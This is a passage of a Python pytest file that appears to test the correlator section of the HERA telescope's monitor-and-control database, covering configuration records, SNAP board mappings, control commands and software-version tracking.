config_hash=status_result.config_hash, return_node_loc_num=True,
)
)
assert len(config_active_snaps_result) == len(active_snaps_list)
# since the request doesn't specify a time, the rosetta mapping for "now" is used.
for index, active_snap in enumerate(config_active_snaps_result):
assert node_list[index] == int(active_snap.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(active_snap.hostname[-1])
# check that using the time options works too
config_active_snaps_result2, time_list, node_list, snap_loc_list = (
test_session.get_correlator_config_active_snaps(
starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
)
)
assert len(config_active_snaps_result2) == len(active_snaps_list)
assert len(time_list) == len(active_snaps_list)
for index, active_snap in enumerate(config_active_snaps_result):
if rosetta_exists:
assert node_list[index] == int(active_snap.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(active_snap.hostname[-1])
else:
assert node_list[index] is None
assert snap_loc_list[index] is None
for time_obj in time_list[1:]:
assert time_obj == time_list[0]
for index, result in enumerate(config_active_snaps_result):
this_hostname = result.hostname
assert this_hostname in active_snaps_list
expected_result = corr.CorrelatorConfigActiveSNAP(
config_hash='testhash',
hostname=this_hostname,
)
assert result.isclose(expected_result)
assert config_active_snaps_result2[index].isclose(expected_result)
config_input_index_result = test_session.get_correlator_config_input_index(
config_hash=status_result.config_hash
)
input_index_dict = {
"0": {"hostname": "heraNode700Snap0", "ant_loc": 0},
"1": {"hostname": "heraNode700Snap0", "ant_loc": 1},
"2": {"hostname": "heraNode700Snap0", "ant_loc": 2},
"3": {"hostname": "heraNode700Snap1", "ant_loc": 0},
"4": {"hostname": "heraNode700Snap1", "ant_loc": 1},
"5": {"hostname": "heraNode700Snap1", "ant_loc": 2},
"6": {"hostname": "heraNode700Snap2", "ant_loc": 0},
"7": {"hostname": "heraNode700Snap2", "ant_loc": 1},
"8": {"hostname": "heraNode700Snap2", "ant_loc": 2},
"9": {"hostname": "heraNode700Snap3", "ant_loc": 0},
"10": {"hostname": "heraNode700Snap3", "ant_loc": 1},
"11": {"hostname": "heraNode700Snap3", "ant_loc": 2},
}
assert len(config_input_index_result) == len(input_index_dict)
# check that we can also get the nodes & snap loc nums
config_input_index_result, node_list, snap_loc_list = (
test_session.get_correlator_config_input_index(
config_hash=status_result.config_hash, return_node_loc_num=True
)
)
assert len(config_input_index_result) == len(input_index_dict)
# since the request doesn't specify a time, the rosetta mapping for "now" is used.
for index, input_index in enumerate(config_input_index_result):
assert node_list[index] == int(input_index.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(input_index.hostname[-1])
# check that using the time options works too
config_input_index_result2, time_list, node_list, snap_loc_list = (
test_session.get_correlator_config_input_index(
starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
)
)
assert len(config_input_index_result2) == len(input_index_dict)
assert len(time_list) == len(input_index_dict)
for index, input_index in enumerate(config_input_index_result2):
if rosetta_exists:
assert node_list[index] == int(input_index.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(input_index.hostname[-1])
else:
assert node_list[index] is None
assert snap_loc_list[index] is None
for time_obj in time_list[1:]:
assert time_obj == time_list[0]
for corr_index, info in input_index_dict.items():
config_input_index_result = test_session.get_correlator_config_input_index(
config_hash=status_result.config_hash,
correlator_index=int(corr_index),
)
config_input_index_expected = corr.CorrelatorConfigInputIndex(
config_hash='testhash',
correlator_index=int(corr_index),
hostname=info["hostname"],
antenna_index_position=info["ant_loc"],
)
assert len(config_input_index_result) == 1
config_input_index_result = config_input_index_result[0]
assert config_input_index_result.isclose(config_input_index_expected)
# check that using the time options works too
config_input_index_result, time_list = test_session.get_correlator_config_input_index(
starttime=t1 - TimeDelta(3.0, format='sec'),
correlator_index=int(corr_index),
)
assert len(config_input_index_result) == 1
config_input_index_result = config_input_index_result[0]
assert config_input_index_result.isclose(config_input_index_expected)
config_phase_switch_result = test_session.get_correlator_config_phase_switch_index(
config_hash=status_result.config_hash
)
phase_switch_dict = {
"1": {"hostname": "heraNode700Snap0", "antpol_index": 0},
"2": {"hostname": "heraNode700Snap0", "antpol_index": 1},
"3": {"hostname": "heraNode700Snap0", "antpol_index": 2},
"4": {"hostname": "heraNode700Snap0", "antpol_index": 3},
"5": {"hostname": "heraNode700Snap0", "antpol_index": 4},
"6": {"hostname": "heraNode700Snap0", "antpol_index": 5},
"7": {"hostname": "heraNode700Snap1", "antpol_index": 0},
"8": {"hostname": "heraNode700Snap1", "antpol_index": 1},
"9": {"hostname": "heraNode700Snap1", "antpol_index": 2},
"10": {"hostname": "heraNode700Snap1", "antpol_index": 3},
"11": {"hostname": "heraNode700Snap1", "antpol_index": 4},
"12": {"hostname": "heraNode700Snap1", "antpol_index": 5},
"13": {"hostname": "heraNode700Snap2", "antpol_index": 0},
"14": {"hostname": "heraNode700Snap2", "antpol_index": 1},
"15": {"hostname": "heraNode700Snap2", "antpol_index": 2},
"16": {"hostname": "heraNode700Snap2", "antpol_index": 3},
"17": {"hostname": "heraNode700Snap2", "antpol_index": 4},
"18": {"hostname": "heraNode700Snap2", "antpol_index": 5},
"19": {"hostname": "heraNode700Snap3", "antpol_index": 0},
"20": {"hostname": "heraNode700Snap3", "antpol_index": 1},
"21": {"hostname": "heraNode700Snap3", "antpol_index": 2},
"22": {"hostname": "heraNode700Snap3", "antpol_index": 3},
"23": {"hostname": "heraNode700Snap3", "antpol_index": 4},
"24": {"hostname": "heraNode700Snap3", "antpol_index": 5},
}
assert len(config_phase_switch_result) == len(phase_switch_dict)
# check that we can also get the nodes & snap loc nums
config_phase_switch_result, node_list, snap_loc_list = (
test_session.get_correlator_config_phase_switch_index(
config_hash=status_result.config_hash, return_node_loc_num=True
)
)
assert len(config_phase_switch_result) == len(phase_switch_dict)
# since the request doesn't specify a time, the rosetta mapping for "now" is used.
for index, ps_index in enumerate(config_phase_switch_result):
assert node_list[index] == int(ps_index.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(ps_index.hostname[-1])
# check that using the time options works too
config_phase_switch_result2, time_list, node_list, snap_loc_list = (
test_session.get_correlator_config_phase_switch_index(
starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
)
)
assert len(config_phase_switch_result2) == len(phase_switch_dict)
assert len(time_list) == len(phase_switch_dict)
for index, ps_index in enumerate(config_phase_switch_result2):
if rosetta_exists:
assert node_list[index] == int(ps_index.hostname.split('S')[0][8:])
assert snap_loc_list[index] == int(ps_index.hostname[-1])
else:
assert node_list[index] is None
assert snap_loc_list[index] is None
for time_obj in time_list[1:]:
assert time_obj == time_list[0]
for index, result in enumerate(config_phase_switch_result):
phase_switch_index = result.phase_switch_index
this_dict = phase_switch_dict[str(phase_switch_index)]
config_phase_switch_expected = corr.CorrelatorConfigPhaseSwitchIndex(
config_hash='testhash',
hostname=this_dict["hostname"],
phase_switch_index=phase_switch_index,
antpol_index_position=this_dict["antpol_index"],
)
assert result.isclose(config_phase_switch_expected)
assert config_phase_switch_result2[index].isclose(config_phase_switch_expected)
def test_add_correlator_config_from_corrcm_match_prior(mcsession, corr_config_dict):
test_session = mcsession
# test behavior when matching config exists at an earlier time
t1 = Time(1230372020, format='gps')
t0 = t1 - TimeDelta(30, format='sec')
config_hash = 'testhash'
config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
test_session.add_correlator_config_file(config_hash, config_filename)
test_session.commit()
test_session.add_correlator_config_status(t0, config_hash)
test_session.commit()
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=corr_config_dict, testing=True)
status_expected = corr.CorrelatorConfigStatus(time=int(floor(t1.gps)),
config_hash='testhash')
assert corr_config_list[0].isclose(status_expected)
def test_add_correlator_config_from_corrcm_duplicate(mcsession, corr_config_dict):
test_session = mcsession
# test behavior when duplicate config exists
t1 = Time(1230372020, format='gps')
config_hash = 'testhash'
config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
test_session.add_correlator_config_file(config_hash, config_filename)
test_session.commit()
test_session.add_correlator_config_status(t1, config_hash)
test_session.commit()
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=corr_config_dict, testing=True)
assert len(corr_config_list) == 0
def test_config_errors(mcsession):
test_session = mcsession
pytest.raises(ValueError, test_session.add_correlator_config_status,
'foo', 'testhash')
@requires_redis
def test_add_correlator_config_from_corrcm_onsite(mcsession):
test_session = mcsession
result = test_session.add_correlator_config_from_corrcm(testing=True)
assert len(result) > 0
if len(result) == 1:
# should just be a status object because this file already exists
assert result[0].__class__ == corr.CorrelatorConfigStatus
else:
# first should be a file object, then a bunch of objects for the various parsed
# config tables, then finally a status object.
class_list = [obj.__class__ for obj in result]
assert class_list[0] == corr.CorrelatorConfigFile
assert class_list[-1] == corr.CorrelatorConfigStatus
assert corr.CorrelatorConfigParams in class_list
assert corr.CorrelatorConfigActiveSNAP in class_list
assert corr.CorrelatorConfigInputIndex in class_list
assert corr.CorrelatorConfigPhaseSwitchIndex in class_list
@pytest.mark.parametrize(
("command"),
list(set(corr.command_dict.keys())
- {'take_data', 'update_config'}))
def test_control_command_no_recent_status(mcsession, command):
test_session = mcsession
# test things on & off with no recent status
command_list = test_session.correlator_control_command(
command, testing=True)
assert len(command_list) == 1
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected = corr.CorrelatorControlCommand.create(command_time_obj,
command)
assert command_list[0].isclose(expected)
# test adding the command(s) to the database and retrieving them
for cmd in command_list:
test_session.add(cmd)
result_list = test_session.get_correlator_control_command(
starttime=Time.now() - TimeDelta(10, format='sec'),
stoptime=Time.now() + TimeDelta(10, format='sec'), command=command)
assert len(result_list) == 1
assert command_list[0].isclose(result_list[0])
def test_take_data_command_no_recent_status(mcsession):
test_session = mcsession
# test take_data command with no recent status
starttime = Time.now() + TimeDelta(10, format='sec')
command_list = test_session.correlator_control_command(
'take_data', starttime=starttime, duration=100, tag='engineering',
testing=True)
assert len(command_list) == 2
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(command_time_obj,
'take_data')
assert command_list[0].isclose(expected_comm)
int_time = corr.DEFAULT_ACCLEN_SPECTRA * ((2.0 * 16384) / 500e6)
expected_args = corr.CorrelatorTakeDataArguments.create(
command_time_obj, starttime, 100, corr.DEFAULT_ACCLEN_SPECTRA,
int_time, 'engineering')
assert command_list[1].isclose(expected_args)
# check warning with non-standard acclen_spectra
command_list = checkWarnings(test_session.correlator_control_command,
['take_data'],
{'starttime': starttime, 'duration': 100,
'acclen_spectra': 2048, 'tag': 'engineering',
'testing': True,
'overwrite_take_data': True},
message='Using a non-standard acclen_spectra')
assert len(command_list) == 2
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(command_time_obj,
'take_data')
assert command_list[0].isclose(expected_comm)
int_time = 2048 * ((2.0 * 16384) / 500e6)
expected_args = corr.CorrelatorTakeDataArguments.create(
command_time_obj, starttime, 100, 2048,
int_time, 'engineering')
assert command_list[1].isclose(expected_args)
@pytest.mark.parametrize(
("commands_to_test"),
[list(set(corr.command_dict.keys())
- {'take_data', 'update_config', 'restart', 'hard_stop'})])
def test_control_command_with_recent_status(mcsession, commands_to_test):
test_session = mcsession
# test things on & off with a recent status
for command in commands_to_test:
state_type = corr.command_state_map[command]['state_type']
state = corr.command_state_map[command]['state']
t1 = Time.now() - TimeDelta(30 + 60, format='sec')
test_session.add_correlator_control_state(t1, state_type, state)
command_list = test_session.correlator_control_command(
command, testing=True)
assert len(command_list) == 0
t2 = Time.now() - TimeDelta(30, format='sec')
test_session.add_correlator_control_state(t2, state_type, not(state))
command_list = test_session.correlator_control_command(
command, testing=True)
assert len(command_list) == 1
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected = corr.CorrelatorControlCommand.create(command_time_obj,
command)
assert command_list[0].isclose(expected)
test_session.rollback()
result = test_session.get_correlator_control_state(
most_recent=True, state_type=state_type)
assert len(result) == 0
def test_take_data_command_with_recent_status(mcsession):
test_session = mcsession
# test take_data command with recent status
t1 = Time.now() - TimeDelta(60, format='sec')
test_session.add_correlator_control_state(t1, 'taking_data', True)
pytest.raises(RuntimeError, test_session.correlator_control_command,
'take_data',
starttime=Time.now() + TimeDelta(10, format='sec'),
duration=100, tag='engineering', testing=True)
t2 = Time.now() - TimeDelta(30, format='sec')
test_session.add_correlator_control_state(t2, 'taking_data', False)
t3 = Time.now() + TimeDelta(10, format='sec')
control_command_objs = test_session.correlator_control_command(
'take_data', starttime=t3, duration=100, tag='engineering',
testing=True)
for obj in control_command_objs:
test_session.add(obj)
test_session.commit()
time.sleep(1)
starttime = Time.now() + TimeDelta(10, format='sec')
pytest.raises(RuntimeError, test_session.correlator_control_command,
'take_data',
starttime=starttime + TimeDelta(30, format='sec'),
duration=100, tag='engineering', testing=True)
command_list = checkWarnings(
test_session.correlator_control_command, func_args=['take_data'],
func_kwargs={'starttime': starttime, 'duration': 100,
'tag': 'engineering', 'testing': True,
'overwrite_take_data': True},
message='Correlator was commanded to take data')
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(
command_time_obj, 'take_data')
assert command_list[0].isclose(expected_comm)
int_time = corr.DEFAULT_ACCLEN_SPECTRA * ((2.0 * 16384) / 500e6)
expected_args = corr.CorrelatorTakeDataArguments.create(
command_time_obj, starttime, 100, corr.DEFAULT_ACCLEN_SPECTRA,
int_time, 'engineering')
assert command_list[1].isclose(expected_args)
for obj in command_list:
test_session.add(obj)
test_session.commit()
result_args = test_session.get_correlator_take_data_arguments(
most_recent=True, use_command_time=True)
assert len(result_args) == 1
assert result_args[0].isclose(expected_args)
result_args = test_session.get_correlator_take_data_arguments(
starttime=Time.now())
assert len(result_args) == 1
assert not result_args[0].isclose(expected_args)
@pytest.mark.parametrize(
("command", "kwargs"),
[('foo', {}),
('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
'duration': 100}),
('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
'tag': 'engineering'}),
('take_data', {'duration': 100, 'tag': 'engineering'}),
('take_data', {'starttime': 'foo', 'duration': 100,
'tag': 'engineering'}),
('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
'duration': 100, 'tag': 'foo'}),
('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
'duration': 100, 'tag': 'foo', 'acclen_spectra': 2}),
('noise_diode_on',
{'starttime': Time.now() + TimeDelta(10, format='sec')}),
('phase_switching_off', {'duration': 100}),
('restart', {'acclen_spectra': corr.DEFAULT_ACCLEN_SPECTRA}),
('noise_diode_off', {'tag': 'engineering'})])
def test_control_command_errors(mcsession, command, kwargs):
test_session = mcsession
pytest.raises(ValueError, test_session.correlator_control_command,
command, testing=True, **kwargs)
@pytest.mark.parametrize(
("command"), list(set(corr.command_dict.keys())
- {'take_data', 'update_config', 'stop_taking_data'}))
def test_control_command_errors_taking_data(mcsession, command):
test_session = mcsession
# test bad commands while taking data
t1 = Time.now() - TimeDelta(60, format='sec')
test_session.add_correlator_control_state(t1, 'taking_data', True)
pytest.raises(RuntimeError, test_session.correlator_control_command,
command, testing=True)
def test_control_command_errors_other():
pytest.raises(ValueError, corr.CorrelatorControlCommand.create,
'foo', 'take_data')
t1 = Time('2016-01-10 01:15:23', scale='utc')
pytest.raises(ValueError, corr.CorrelatorTakeDataArguments.create,
'foo', t1, 100, 2, 2 * ((2.0 * 16384) / 500e6),
'engineering')
@requires_redis
def test_get_integration_time():
n_spectra = 147456
int_time = corr._get_integration_time(n_spectra)
assert int_time > 0
@requires_redis
def test_get_next_start_time():
corr._get_next_start_time()
def test_corr_config_command_no_recent_config(mcsession, corr_config):
test_session = mcsession
# test commanding a config with no recent config status
t1 = Time.now()
with open(corr_config[0], 'r') as fh:
config_string = fh.read().encode('utf-8')
config_hash = hashlib.md5(config_string).hexdigest()
command_list = test_session.correlator_control_command(
'update_config', config_file=corr_config[0], testing=True)
assert len(command_list) == 3
# test adding the config obj(s) to the database and retrieving them
for obj in command_list:
test_session.add(obj)
test_session.commit()
file_expected = corr.CorrelatorConfigFile(
config_hash=config_hash, filename=corr_config[0])
assert command_list[0].isclose(file_expected)
file_result = test_session.get_correlator_config_file(config_hash=config_hash)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
command_time = command_list[1].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(
command_time_obj, 'update_config')
assert command_list[1].isclose(expected_comm)
config_comm_expected = corr.CorrelatorConfigCommand.create(
command_time_obj, config_hash)
assert command_list[2].isclose(config_comm_expected)
config_comm_result = test_session.get_correlator_config_command(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(config_comm_result) == 1
config_comm_result = config_comm_result[0]
assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_with_recent_config(mcsession, corr_config, corr_config_dict):
test_session = mcsession
# test commanding a config with a recent (different) config status
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=corr_config_dict, testing=True)
for obj in corr_config_list:
test_session.add(obj)
test_session.commit()
t1 = Time.now()
with open(corr_config[0], 'r') as fh:
config_string = fh.read().encode('utf-8')
config_hash = hashlib.md5(config_string).hexdigest()
command_list = test_session.correlator_control_command(
'update_config', config_file=corr_config[0], testing=True)
assert len(command_list) == 3
# test adding the config obj(s) to the database and retrieving them
for obj in command_list:
test_session.add(obj)
test_session.commit()
file_expected = corr.CorrelatorConfigFile(
config_hash=config_hash, filename=corr_config[0])
assert command_list[0].isclose(file_expected)
file_result = test_session.get_correlator_config_file(config_hash=config_hash)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
command_time = command_list[1].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(
command_time_obj, 'update_config')
assert command_list[1].isclose(expected_comm)
assert Time.now().gps - command_time < 2.
config_comm_expected = corr.CorrelatorConfigCommand.create(
command_time_obj, config_hash)
assert command_list[2].isclose(config_comm_expected)
config_comm_result = test_session.get_correlator_config_command(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(config_comm_result) == 1
config_comm_result = config_comm_result[0]
assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_with_recent_config_match_prior(mcsession,
corr_config,
corr_config_dict):
test_session = mcsession
# test commanding a config with a recent (different) config status but a
# matching prior one
t1 = Time.now()
t0 = Time(1512760942, format='unix')
with open(corr_config[0], 'r') as fh:
config_string = fh.read().encode('utf-8')
config_hash = hashlib.md5(config_string).hexdigest()
# put in a previous matching config
matching_corr_config_dict = {'time': t0, 'hash': config_hash,
'config': corr_config[1]}
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=matching_corr_config_dict, testing=True)
for obj in corr_config_list:
test_session.add(obj)
test_session.commit()
config_filename = 'correlator_config_' + str(int(floor(t0.gps))) + '.yaml'
file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
filename=config_filename)
file_result = test_session.get_correlator_config_file(config_hash=config_hash)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
# make more recent one that doesn't match
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=corr_config_dict, testing=True)
for obj in corr_config_list:
test_session.add(obj)
test_session.commit()
command_list = test_session.correlator_control_command(
'update_config', config_file=corr_config[0], testing=True)
assert len(command_list) == 2
# test adding the config obj(s) to the database and retrieving them
for obj in command_list:
test_session.add(obj)
test_session.commit()
command_time = command_list[0].time
assert Time.now().gps - command_time < 2.
command_time_obj = Time(command_time, format='gps')
expected_comm = corr.CorrelatorControlCommand.create(
command_time_obj, 'update_config')
assert command_list[0].isclose(expected_comm)
config_comm_expected = corr.CorrelatorConfigCommand.create(
command_time_obj, config_hash)
assert command_list[1].isclose(config_comm_expected)
config_comm_result = test_session.get_correlator_config_command(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(config_comm_result) == 1
config_comm_result = config_comm_result[0]
assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_same_recent_config(mcsession, corr_config):
test_session = mcsession
# test commanding a config with the same recent config status
t0 = Time(1512760942, format='unix')
with open(corr_config[0], 'r') as fh:
config_string = fh.read().encode('utf-8')
config_hash = hashlib.md5(config_string).hexdigest()
# put in a previous matching config
matching_corr_config_dict = {'time': t0, 'hash': config_hash,
'config': corr_config[1]}
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=matching_corr_config_dict, testing=True)
for obj in corr_config_list:
test_session.add(obj)
test_session.commit()
config_filename = 'correlator_config_' + str(int(floor(t0.gps))) + '.yaml'
file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
filename=config_filename)
file_result = test_session.get_correlator_config_file(config_hash=config_hash)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
command_list = test_session.correlator_control_command(
'update_config', config_file=corr_config[0], testing=True)
assert len(command_list) == 0
def test_config_command_errors(mcsession, corr_config):
test_session = mcsession
pytest.raises(ValueError, corr.CorrelatorConfigCommand.create,
'foo', 'testhash')
# not setting config_file with 'update_config' command
pytest.raises(ValueError, test_session.correlator_control_command,
'update_config', testing=True)
# setting config_file with other commands
pytest.raises(ValueError, test_session.correlator_control_command,
'restart', config_file=corr_config[0], testing=True)
starttime = Time.now() + TimeDelta(10, format='sec')
pytest.raises(ValueError, test_session.correlator_control_command,
'take_data', starttime=starttime, duration=100,
tag='engineering', config_file=corr_config[0], testing=True)
def test_add_correlator_software_versions(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
test_session.add_correlator_software_versions(
t1, 'hera_corr_f', '0.0.1-3c7fdaf6')
expected = corr.CorrelatorSoftwareVersions(
time=int(floor(t1.gps)), package='hera_corr_f',
version='0.0.1-3c7fdaf6')
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
test_session.add_correlator_software_versions(
t1, 'hera_corr_cm', '0.0.1-11a573c9')
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'), package='hera_corr_f')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_software_versions(
package='hera_corr_f')
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
expected = corr.CorrelatorSoftwareVersions(
time=int(floor(t1.gps)), package='hera_corr_cm',
version='0.0.1-11a573c9')
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'),
package='hera_corr_cm')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_software_versions(
package='hera_corr_cm')
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
assert len(result) == 2
result_most_recent = test_session.get_correlator_software_versions()
assert len(result) == 2
result = test_session.get_correlator_software_versions(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
def test_software_version_errors(mcsession):
test_session = mcsession
pytest.raises(ValueError, test_session.add_correlator_software_versions,
'foo', 'hera_corr_cm', '0.0.1-11a573c9')
def test_add_snap_config_version(mcsession, feng_config, init_args):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
t2 = t1 + TimeDelta(120.0, format='sec')
test_session.add_correlator_config_file('testhash', feng_config[0])
test_session.commit()
test_session.add_correlator_config_status(t1, 'testhash')
test_session.commit()
test_session.add_snap_config_version(
t1, '0.0.1-3c7fdaf6', init_args, 'testhash')
expected = corr.SNAPConfigVersion(
init_time=int(floor(t1.gps)), version='0.0.1-3c7fdaf6',
init_args=init_args, config_hash='testhash')
result = test_session.get_snap_config_version(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
test_session.add_correlator_config_file('testhash2', feng_config[0])
test_session.commit()
test_session.add_correlator_config_status(t2, 'testhash2')
test_session.commit()
test_session.add_snap_config_version(
t2, '0.0.1-11a573c9', init_args, 'testhash2')
expected = corr.SNAPConfigVersion(
init_time=int(floor(t2.gps)), version='0.0.1-11a573c9',
init_args=init_args, config_hash='testhash2')
result = test_session.get_snap_config_version(
starttime=t2 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_config_version()
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_snap_config_version(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t2)
assert len(result) == 2
result = test_session.get_snap_config_version(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
def test_snap_config_version_errors(mcsession, init_args):
test_session = mcsession
pytest.raises(ValueError, test_session.add_snap_config_version,
'foo', '0.0.1-3c7fdaf6', init_args, 'testhash')
def test_add_corr_snap_versions_from_corrcm(mcsession, snapversion, init_args):
test_session = mcsession
# use testing to prevent call to hera_librarian to save new config file
corr_snap_version_obj_list = \
test_session.add_corr_snap_versions_from_corrcm(
corr_snap_version_dict=snapversion, testing=True)
for obj in corr_snap_version_obj_list:
test_session.add(obj)
test_session.commit()
t1 = Time(datetime.datetime(2019, 4, 2, 19, 7, 14), format='datetime')
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'))
expected = corr.CorrelatorSoftwareVersions(
time=int(floor(t1.gps)),
package='hera_corr_f:hera_snap_redis_monitor.py',
version='0.0.1-3c7fdaf6')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_software_versions(
package='hera_corr_f:hera_snap_redis_monitor.py')
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result_most_recent = test_session.get_correlator_software_versions()
assert len(result_most_recent) == 3
most_recent_packages = sorted(res.package for res in result_most_recent)
expected_recent_packages = sorted(['udpSender:hera_node_keep_alive.py',
'udpSender:hera_node_cmd_check.py',
'hera_corr_cm'])
assert most_recent_packages == expected_recent_packages
result = test_session.get_correlator_software_versions(
starttime=t1 - TimeDelta(3.0, format='sec'),
stoptime=t1 + TimeDelta(10.0, format='sec'))
assert len(result) == 5
t2 = Time(datetime.datetime(2019, 3, 27, 8, 28, 25), format='datetime')
result = test_session.get_snap_config_version(
starttime=t2 - TimeDelta(3.0, format='sec'))
expected = corr.SNAPConfigVersion(init_time=int(floor(t2.gps)),
version='0.0.1-3c7fdaf6',
init_args=init_args,
config_hash='testhash')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_config_version()
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
t3 = Time(datetime.datetime(2019, 2, 18, 5, 41, 29), format='datetime')
result = test_session.get_correlator_config_status(
starttime=t3 - TimeDelta(3.0, format='sec'))
expected = corr.CorrelatorConfigStatus(time=int(floor(t3.gps)),
config_hash='testhash')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_config_status()
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
# test that a new hera_corr_cm timestamp with the same version doesn't make
# a new row
new_dict = copy.deepcopy(snapversion)
new_dict['hera_corr_cm']['timestamp'] = (
datetime.datetime(2019, 4, 2, 19, 8, 17, 644984))
corr_snap_version_obj_list = \
test_session.add_corr_snap_versions_from_corrcm(
corr_snap_version_dict=new_dict)
t4 = Time(datetime.datetime(2019, 4, 2, 19, 7, 17), format='datetime')
t5 = Time(datetime.datetime(2019, 4, 2, 19, 8, 17), format='datetime')
expected = corr.CorrelatorSoftwareVersions(
time=int(floor(t4.gps)), package='hera_corr_cm',
version='0.0.1-11a573c9')
result = test_session.get_correlator_software_versions(
starttime=t4 - TimeDelta(3.0, format='sec'),
stoptime=t5 + TimeDelta(10.0, format='sec'),
package='hera_corr_cm')
assert len(result) == 1
assert result[0].isclose(expected)
# test that a new hera_corr_cm timestamp with a new version makes a new row
new_dict = copy.deepcopy(snapversion)
new_dict['hera_corr_cm']['timestamp'] = (
datetime.datetime(2019, 4, 2, 19, 8, 17, 644984))
new_dict['hera_corr_cm']['version'] = '0.0.1-b43b2b72'
corr_snap_version_obj_list = \
test_session.add_corr_snap_versions_from_corrcm(
corr_snap_version_dict=new_dict)
expected = corr.CorrelatorSoftwareVersions(
time=int(floor(t5.gps)), package='hera_corr_cm',
version='0.0.1-b43b2b72')
result = test_session.get_correlator_software_versions(
starttime=t4 - TimeDelta(3.0, format='sec'),
stoptime=t5 + TimeDelta(10.0, format='sec'),
package='hera_corr_cm')
assert len(result) == 2
assert result[1].isclose(expected)
@onsite
def test_onsite_add_corr_snap_versions_from_corrcm(mcsession):
# this has to be done onsite, not in CI because it needs to talk to the librarian
# as well (to register the config file in the librarian)
test_session = mcsession
test_session.add_corr_snap_versions_from_corrcm()
result = test_session.get_correlator_software_versions(
package='hera_corr_cm', most_recent=True)
assert len(result) == 1
result = test_session.get_correlator_software_versions()
assert len(result) >= 1
result = test_session.get_snap_config_version()
assert len(result) == 1
def test_add_snap_status(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
t_prog = Time('2016-01-05 20:00:00', scale='utc')
test_session.add_snap_status(t1, 'heraNode700Snap0', 'SNPA000700',
False, 595687, 57.984954833984375,
595686, t_prog)
